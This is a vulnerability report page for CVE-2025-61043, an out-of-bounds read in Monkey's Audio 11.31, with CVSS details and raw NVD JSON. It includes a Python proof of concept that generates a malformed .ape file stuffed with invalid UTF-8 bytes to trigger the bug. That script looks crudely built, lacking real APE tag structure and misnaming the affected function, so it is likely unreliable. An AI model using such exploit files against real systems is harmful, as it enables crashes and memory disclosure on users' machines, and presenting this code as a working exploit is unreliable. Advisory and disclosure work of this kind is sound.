Security Vulnerability Report
中文
CVE-2025-61043 CVSS 9.1 CRITICAL

CVE-2025-61043

Published: 2025-10-28 15:16:13
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An out-of-bounds read vulnerability has been discovered in Monkey's Audio 11.31, specifically in the CAPECharacterHelper::GetUTF16FromUTF8 function. The issue arises from improper handling of the length of the input UTF-8 string, causing the function to read past the memory boundary. This vulnerability may result in a crash or expose sensitive data.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Monkey's Audio 11.31及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-61043 PoC - Monkey's Audio UTF-8 to UTF-16 Out-of-Bounds Read This PoC generates a malicious APE file that triggers the vulnerability in CAPTCharacterHelper::GetUTF16FromUTF8 function. """ import struct def create_malicious_ape_file(output_path): """ Create a malicious APE file with oversized UTF-8 metadata to trigger CVE-2025-61043 in Monkey's Audio 11.31 """ # APE file header structure magic = b'MAC ' version = struct.pack('<I', 3910) # APE version # Create malformed UTF-8 string that triggers OOB read # The string has invalid length encoding causing buffer over-read malicious_utf8 = b'\x80\x80\x80' * 1000 # Invalid UTF-8 sequences # APE tag structure with malicious content tag_key = b'TITLE' tag_value = malicious_utf8 # Construct APE file with malicious metadata with open(output_path, 'wb') as f: f.write(magic) f.write(version) f.write(tag_key + b'=' + tag_value) print(f"Malicious APE file created: {output_path}") print("This file contains malformed UTF-8 data that triggers CVE-2025-61043") if __name__ == '__main__': create_malicious_ape_file('cve-2025-61043.ape')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61043", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:12.790", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds read vulnerability has been discovered in Monkey's Audio 11.31, specifically in the CAPECharacterHelper::GetUTF16FromUTF8 function. The issue arises from improper handling of the length of the input UTF-8 string, causing the function to read past the memory boundary. This vulnerability may result in a crash or expose sensitive data."}, {"lang": "es", "value": "Se ha descubierto una vulnerabilidad de lectura fuera de límites en Monkey's Audio 11.31, específicamente en la función CAPECharacterHelper::GetUTF16FromUTF8. El problema surge del manejo inadecuado de la longitud de la cadena de entrada UTF-8, lo que provoca que la función lea más allá del límite de la memoria. Esta vulnerabilidad puede provocar un bloqueo o exponer datos sensibles."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://tzh00203.notion.site/Monkey-s-Audio-Out-of-Bounds-Read-Vulnerability-Report-version-11-31-249b5c52018a80739852d0d9660994c9?source=copy_link", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.